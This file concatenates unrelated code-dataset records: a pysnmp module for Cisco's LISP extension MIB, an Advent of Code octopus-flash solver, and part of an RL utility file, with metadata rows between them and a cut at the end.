Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noEidPrefixConfiguration", 1), ("authenticationFailure", 2), ("allowedLocatorMismatch", 3)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: clispExtEidRegFailureCause.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegFailureCause.setDescription("This object indicates the cause of the map registration failure on the map-server. 'noEidPrefixConfiguration' No site configuration to accept registration for EID prefix. 'authenticationFailure' Failed to authenticate map-register for EID prefix. 'allowedLocatorMismatch' map-register contains RLOC that is not in the site's allowed locator list.") clispExtEidRegMapRequestDroppedCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("malformedRequest", 1), ("noMatchingEidRegistration", 2), ("allowedLocatorPolicyViolation", 3)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setDescription("This object indicates the cause of the map-request drop on the map-resolver. 'malformedRequest' map-request is not valid. 'noMatchingEidRegistration' could not find matching EID registration for the map-request. 'allowedLocatorPolicyViolation' map request does not conform to the configured allowed-locator policy.") clispExtGlobalObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7)) clispExtEidRegMoreSpecificWarningThreshold = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 1), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning threshold for the accept-more-specific registration count on the map-server. This warning threshold is applicable to all EID instances.') clispExtEidRegMoreSpecificLimit = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 2), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server. This is applicable to all EID instances.') clispExtEidRegMoreSpecificCount = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 3), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setDescription('This object indicates the number of map registrations accepted as a result of accept-more-specific configuration. This is applicable to all EID instances.') clispExtUseMapResolverStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 1)).setObjects(("LISP-MIB", "lispUseMapResolverState")) if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setDescription('The device generates this notification when the map-resolver reachability state changes. The lispUseMapResolverAddressLength and lispUseMapResolverAddress values are attached to the notification object ID.') clispExtReliableTransportStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState")) if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setDescription('The device generates this notification when the reliable transport session state changes. The clispReliableTransportSessionPeerAddressLength, clispReliableTransportSessionPeerAddress, clispReliableTransportSessionPeerPort, clispReliableTransportSessionLocalAddressLength, clispReliableTransportSessionLocalAddress, clispReliableTransportSessionLocalPort values are attached to the notification object ID.') clispExtMappingDatabaseEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 3)).setObjects(("LISP-MIB", "lispMappingDatabaseTimeStamp"), ("LISP-MIB", "lispUseMapServerState")) if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setStatus('current') if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setDescription('The device generates this notification when the xTR fails to register a database mapping with the map-server. The lispMappingDatabaseEidLength, lispMappingDatabaseEid, lispUseMapServerAddressLength, lispUseMapServerAddress values are attached to the notification object ID.') clispExtUseMapServerStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 4)).setObjects(("LISP-MIB", "lispUseMapServerState")) if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setDescription('The device generates this notification when the map-server reachability state changes. The lispUseMapServerAddressLength and lispUseMapServerAddress values are attached to the notification object ID.') clispExtUseProxyEtrStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 5)).setObjects(("LISP-MIB", "lispUseProxyEtrState")) if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setStatus('current') if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setDescription('The device generates this notification when the proxy ETR reachability state changes. The lispUseProxyEtrAddressLength and lispUseProxyEtrAddress values are attached to the notification object ID.') clispExtEidRegSiteAllRegistrationsExpired = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 6)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName")) if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setDescription('The device generates this notification when all the registration for a site expires on the map-server. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.') clispExtEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 7)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause")) if mibBuilder.loadTexts: clispExtEidRegFailure.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegFailure.setDescription('The device generates this notification when the map-server fails to accept a map registration. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID. If clispExtEidRegFailureCause value is noEidPrefixConfiguration(1) the lispEidRegistrationSiteName object in the notification will be empty.') clispExtFeaturesEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit")) if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') clispExtFeaturesEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 9)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold")) if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') clispExtEidRegMapRequestDropped = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 10)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause")) if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setDescription('The device generates this notification when the map-resolver drops a map-request because the map-request does not conform to configured policy. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.') clispExtEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 11)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit")) if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. This notification is router LISP instance specific.') clispExtEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 12)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold")) if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is router LISP instance specific.') clispExtFeaturesMapCacheLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 13)).setObjects(("LISP-MIB", "lispFeaturesMapCacheLimit")) if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setDescription('The device generates this notification when the xTR has reached the limit of the number of map-cache it can create. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') clispExtFeaturesMapCacheWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 14)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold")) if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setDescription('The device generates this notification when the xTR has reached the threshold of the number of map-cache it can create. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.') ciscoLispExtCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1)) ciscoLispExtGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2)) ciscoLispExtMIBComplianceAll = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): ciscoLispExtMIBComplianceAll = ciscoLispExtMIBComplianceAll.setStatus('current') if mibBuilder.loadTexts: ciscoLispExtMIBComplianceAll.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by all LISP (P)xTR devices. Map-server database of gleaned RLOC addresses only need to be supported on LISP Map Server.') ciscoLispExtMIBComplianceMapServer = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): ciscoLispExtMIBComplianceMapServer = ciscoLispExtMIBComplianceMapServer.setStatus('current') if mibBuilder.loadTexts: ciscoLispExtMIBComplianceMapServer.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by LISP Map Server devices.') clispExtNotificationsGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtUseMapResolverStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtMappingDatabaseEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtUseMapServerStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtUseProxyEtrStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegSiteAllRegistrationsExpired"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDropped"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThresholdReached")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtNotificationsGroup = clispExtNotificationsGroup.setStatus('current') if mibBuilder.loadTexts: clispExtNotificationsGroup.setDescription('Objects required for LISP notifications.') clispExtEidRegRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGleaned"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipConfigured")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtEidRegRlocMembershipGroup = clispExtEidRegRlocMembershipGroup.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGroup.setDescription('A collection of objects to support reporting MapServer database of RLOC membership.') clispExtRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 3)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipDiscovered"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipConfigured")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtRlocMembershipGroup = clispExtRlocMembershipGroup.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipGroup.setDescription('A collection of objects to support reporting RLOC membership information.') clispExtReliableTransportSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 4)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLastStateChangeTime"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionEstablishmentRole"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesOut"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesOut")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtReliableTransportSessionGroup = clispExtReliableTransportSessionGroup.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionGroup.setDescription('A collection of objects to support reporting \\ ReliableTransportSession information.') clispExtGlobalStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 5)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEidRegMoreSpecificEntryCount")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtGlobalStatsGroup = clispExtGlobalStatsGroup.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispGlobalStatsTable') clispExtFeaturesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 6)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtFeaturesGroup = clispExtFeaturesGroup.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispFeaturesTable.') clispExtNotificationSupportGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 7)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtNotificationSupportGroup = clispExtNotificationSupportGroup.setStatus('current') if mibBuilder.loadTexts: clispExtNotificationSupportGroup.setDescription('A collection of objects to be supplied within notifications.') clispExtEidRegMoreSpecificValuesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificCount")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtEidRegMoreSpecificValuesGroup = clispExtEidRegMoreSpecificValuesGroup.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificValuesGroup.setDescription('A collection of objects to be supplied within notifications.') mibBuilder.exportSymbols("CISCO-LISP-EXT-MIB", clispExtReliableTransportSessionLocalPort=clispExtReliableTransportSessionLocalPort, clispExtReliableTransportSessionEntry=clispExtReliableTransportSessionEntry, clispExtNotificationObjects=clispExtNotificationObjects, clispExtFeaturesEntry=clispExtFeaturesEntry, clispExtFeaturesMapCacheLimitReached=clispExtFeaturesMapCacheLimitReached, clispExtMappingDatabaseEidRegFailure=clispExtMappingDatabaseEidRegFailure, clispExtGlobalStatsEntry=clispExtGlobalStatsEntry, clispExtEidRegRlocMembershipConfigured=clispExtEidRegRlocMembershipConfigured, clispExtEidRegRlocMembershipRloc=clispExtEidRegRlocMembershipRloc, clispExtGlobalStatsEidRegMoreSpecificEntryCount=clispExtGlobalStatsEidRegMoreSpecificEntryCount, clispExtGlobalStatsGroup=clispExtGlobalStatsGroup, clispExtFeaturesEidRegMoreSpecificWarningThreshold=clispExtFeaturesEidRegMoreSpecificWarningThreshold, clispExtNotificationSupportGroup=clispExtNotificationSupportGroup, clispExtUseProxyEtrStateChange=clispExtUseProxyEtrStateChange, clispExtUseMapResolverStateChange=clispExtUseMapResolverStateChange, clispExtRlocMembershipTable=clispExtRlocMembershipTable, ciscoLispExtMIBComplianceMapServer=ciscoLispExtMIBComplianceMapServer, ciscoLispExtConformance=ciscoLispExtConformance, ciscoLispExtMIB=ciscoLispExtMIB, clispExtRlocMembershipGroup=clispExtRlocMembershipGroup, clispExtEidRegRlocMembershipEidAfi=clispExtEidRegRlocMembershipEidAfi, clispExtReliableTransportSessionTable=clispExtReliableTransportSessionTable, clispExtFeaturesEidRegMoreSpecificWarningThresholdReached=clispExtFeaturesEidRegMoreSpecificWarningThresholdReached, clispExtReliableTransportSessionPeerAddressLength=clispExtReliableTransportSessionPeerAddressLength, clispExtEidRegMoreSpecificLimitReached=clispExtEidRegMoreSpecificLimitReached, clispExtFeaturesMapCacheWarningThresholdReached=clispExtFeaturesMapCacheWarningThresholdReached, clispExtRlocMembershipEidAfi=clispExtRlocMembershipEidAfi, clispExtEidRegMoreSpecificCount=clispExtEidRegMoreSpecificCount, clispExtEidRegMoreSpecificWarningThresholdReached=clispExtEidRegMoreSpecificWarningThresholdReached, clispExtRlocMembershipInstanceID=clispExtRlocMembershipInstanceID, clispExtEidRegMoreSpecificValuesGroup=clispExtEidRegMoreSpecificValuesGroup, clispExtReliableTransportSessionEstablishmentRole=clispExtReliableTransportSessionEstablishmentRole, clispExtRlocMembershipRlocLength=clispExtRlocMembershipRlocLength, clispExtReliableTransportSessionState=clispExtReliableTransportSessionState, clispExtFeaturesEidRegMoreSpecificLimit=clispExtFeaturesEidRegMoreSpecificLimit, clispExtEidRegRlocMembershipEntry=clispExtEidRegRlocMembershipEntry, clispExtRlocMembershipDiscovered=clispExtRlocMembershipDiscovered, clispExtEidRegFailure=clispExtEidRegFailure, clispExtReliableTransportSessionMessagesOut=clispExtReliableTransportSessionMessagesOut, clispExtRlocMembershipEntry=clispExtRlocMembershipEntry, ciscoLispExtCompliances=ciscoLispExtCompliances, clispExtReliableTransportSessionPeerPort=clispExtReliableTransportSessionPeerPort, clispExtEidRegRlocMembershipRlocLength=clispExtEidRegRlocMembershipRlocLength, ciscoLispExtNotifications=ciscoLispExtNotifications, clispExtRlocMembershipConfigured=clispExtRlocMembershipConfigured, clispExtFeaturesMapCacheWarningThreshold=clispExtFeaturesMapCacheWarningThreshold, clispExtNotificationsGroup=clispExtNotificationsGroup, clispExtUseMapServerStateChange=clispExtUseMapServerStateChange, clispExtEidRegMapRequestDropped=clispExtEidRegMapRequestDropped, clispExtReliableTransportStateChange=clispExtReliableTransportStateChange, clispExtGlobalObjects=clispExtGlobalObjects, clispExtReliableTransportSessionLocalAddressLength=clispExtReliableTransportSessionLocalAddressLength, clispExtEidRegRlocMembershipTable=clispExtEidRegRlocMembershipTable, clispExtEidRegMoreSpecificLimit=clispExtEidRegMoreSpecificLimit, clispExtEidRegSiteAllRegistrationsExpired=clispExtEidRegSiteAllRegistrationsExpired, clispExtEidRegRlocMembershipGroup=clispExtEidRegRlocMembershipGroup, clispExtReliableTransportSessionPeerAddress=clispExtReliableTransportSessionPeerAddress, clispExtFeaturesTable=clispExtFeaturesTable, clispExtFeaturesGroup=clispExtFeaturesGroup, ciscoLispExtGroups=ciscoLispExtGroups, clispExtEidRegMapRequestDroppedCause=clispExtEidRegMapRequestDroppedCause, clispExtEidRegFailureCause=clispExtEidRegFailureCause, clispExtReliableTransportSessionLastStateChangeTime=clispExtReliableTransportSessionLastStateChangeTime, clispExtEidRegRlocMembershipGleaned=clispExtEidRegRlocMembershipGleaned, clispExtEidRegRlocMembershipInstanceID=clispExtEidRegRlocMembershipInstanceID, clispExtRlocMembershipMemberSince=clispExtRlocMembershipMemberSince, clispExtReliableTransportSessionBytesOut=clispExtReliableTransportSessionBytesOut, ciscoLispExtObjects=ciscoLispExtObjects, clispExtReliableTransportSessionBytesIn=clispExtReliableTransportSessionBytesIn, PYSNMP_MODULE_ID=ciscoLispExtMIB, clispExtEidRegRlocMembershipMemberSince=clispExtEidRegRlocMembershipMemberSince, clispExtReliableTransportSessionGroup=clispExtReliableTransportSessionGroup, clispExtReliableTransportSessionLocalAddress=clispExtReliableTransportSessionLocalAddress, clispExtGlobalStatsTable=clispExtGlobalStatsTable, clispExtRlocMembershipRloc=clispExtRlocMembershipRloc, ciscoLispExtMIBComplianceAll=ciscoLispExtMIBComplianceAll, clispExtFeaturesEidRegMoreSpecificLimitReached=clispExtFeaturesEidRegMoreSpecificLimitReached, clispExtReliableTransportSessionMessagesIn=clispExtReliableTransportSessionMessagesIn, clispExtEidRegMoreSpecificWarningThreshold=clispExtEidRegMoreSpecificWarningThreshold)
175.05303
5,644
0.825378
4,494
46,214
8.487316
0.102804
0.043417
0.075979
0.032248
0.453726
0.350794
0.299198
0.280557
0.250066
0.21142
0
0.032393
0.075497
46,214
263
5,645
175.718631
0.860339
0.007141
0
0.043478
0
0.142292
0.360501
0.095826
0
0
0
0
0
1
0
false
0.007905
0.039526
0
0.039526
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bdbe3e3e964d3de239112acfd757c2553c93386b
678
py
Python
11.dumbo-octopus/py/part1.py
rolandbernard/adventofcode-2021
9249815af62d0fcf79b71357330a1456ea3be1ed
[ "BSD-2-Clause" ]
null
null
null
11.dumbo-octopus/py/part1.py
rolandbernard/adventofcode-2021
9249815af62d0fcf79b71357330a1456ea3be1ed
[ "BSD-2-Clause" ]
null
null
null
11.dumbo-octopus/py/part1.py
rolandbernard/adventofcode-2021
9249815af62d0fcf79b71357330a1456ea3be1ed
[ "BSD-2-Clause" ]
null
null
null
import sys import numpy as np raw = sys.stdin.read() map = np.array([[c for c in l] for l in raw.split('\n') if len(l) != 0], dtype=int) def energize(map, i, j): if i >= 0 and j >= 0 and i < map.shape[0] and j < map.shape[1] and map[i, j] < 10: map[i, j] += 1 if map[i, j] >= 10: for di, dj in [(di, dj) for di in range(-1, 2) for dj in range(-1, 2) if di != 0 or dj != 0]: energize(map, i + di, j + dj) flashes = 0 for _ in range(100): for i in range(map.shape[0]): for j in range(map.shape[1]): energize(map, i, j) flashes += (map >= 10).sum() map[map >= 10] = 0 print('Result:', flashes)
26.076923
105
0.513274
130
678
2.669231
0.3
0.069164
0.072046
0.074928
0
0
0
0
0
0
0
0.057325
0.30531
678
25
106
27.12
0.679406
0
0
0
0
0
0.013314
0
0
0
0
0
0
1
0.055556
false
0
0.111111
0
0.166667
0.055556
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbe6b219cb1418af34e685a56c258fed902050b
10,853
py
Python
rlb/utils.py
jaekyeom/drop-bottleneck
85b64ce72ac22af56e167da2817c295b79a03eb7
[ "Apache-2.0", "MIT" ]
8
2021-03-16T05:37:41.000Z
2021-06-18T05:15:15.000Z
rlb/utils.py
jaekyeom/drop-bottleneck
85b64ce72ac22af56e167da2817c295b79a03eb7
[ "Apache-2.0", "MIT" ]
null
null
null
rlb/utils.py
jaekyeom/drop-bottleneck
85b64ce72ac22af56e167da2817c295b79a03eb7
[ "Apache-2.0", "MIT" ]
2
2021-06-23T08:15:16.000Z
2021-08-30T14:13:58.000Z
from __future__ import print_function from collections import OrderedDict, defaultdict import numpy as np import random import copy #from mpi_util import mpi_moments #def fc(x, scope, nh, *, init_scale=1.0, init_bias=0.0): # with tf.variable_scope(scope): # nin = x.get_shape()[1].value # w = tf.get_variable("w", [nin, nh], initializer=ortho_init(init_scale)) # b = tf.get_variable("b", [nh], initializer=tf.constant_initializer(init_bias)) # return tf.matmul(x, w)+b # #def conv(x, scope, *, nf, rf, stride, pad='VALID', init_scale=1.0, data_format='NHWC', one_dim_bias=False, bias_initializer=tf.constant_initializer(0.0)): # if data_format == 'NHWC': # channel_ax = 3 # strides = [1, stride, stride, 1] # bshape = [1, 1, 1, nf] # elif data_format == 'NCHW': # channel_ax = 1 # strides = [1, 1, stride, stride] # bshape = [1, nf, 1, 1] # else: # raise NotImplementedError # bias_var_shape = [nf] if one_dim_bias else [1, nf, 1, 1] # nin = x.get_shape()[channel_ax].value # wshape = [rf, rf, nin, nf] # with tf.variable_scope(scope): # w = tf.get_variable("w", wshape, initializer=ortho_init(init_scale)) # b = tf.get_variable("b", bias_var_shape, initializer=bias_initializer) # if not one_dim_bias and data_format == 'NHWC': # b = tf.reshape(b, bshape) # return b + tf.nn.conv2d(x, w, strides=strides, padding=pad, data_format=data_format) # # #def deconv(x, scope, *, nf, rf, stride, init_scale=1.0, data_format='NHWC'): # if data_format == 'NHWC': # channel_ax = 3 # strides = (stride, stride) # #strides = [1, stride, stride, 1] # elif data_format == 'NCHW': # channel_ax = 1 # strides = (stride, stride) # #strides = [1, 1, stride, stride] # else: # raise NotImplementedError # # with tf.variable_scope(scope): # out = tf.contrib.layers.conv2d_transpose(x, # num_outputs=nf, # kernel_size=rf, # stride=strides, # padding='VALID', # weights_initializer=ortho_init(init_scale), # biases_initializer=tf.constant_initializer(0.0), # activation_fn=None, # data_format=data_format) # return out # # #def ortho_init(scale=1.0): # def _ortho_init(shape, dtype, partition_info=None): # #lasagne ortho init for tf # shape = tuple(shape) # if len(shape) == 2: # flat_shape = shape # elif len(shape) == 4: # assumes NHWC # flat_shape = (np.prod(shape[:-1]), shape[-1]) # else: # raise NotImplementedError # a = np.random.normal(0.0, 1.0, flat_shape) # u, _, v = np.linalg.svd(a, full_matrices=False) # q = u if u.shape == flat_shape else v # pick the one with the correct shape # q = q.reshape(shape) # return (scale * q[:shape[0], :shape[1]]).astype(np.float32) # return _ortho_init def tile_images(array, n_cols=None, max_images=None, div=1): if max_images is not None: array = array[:max_images] if len(array.shape) == 4 and array.shape[3] == 1: array = array[:, :, :, 0] assert len(array.shape) in [3, 4], "wrong number of dimensions - shape {}".format(array.shape) if len(array.shape) == 4: assert array.shape[3] == 3, "wrong number of channels- shape {}".format(array.shape) if n_cols is None: n_cols = max(int(np.sqrt(array.shape[0])) // div * div, div) n_rows = 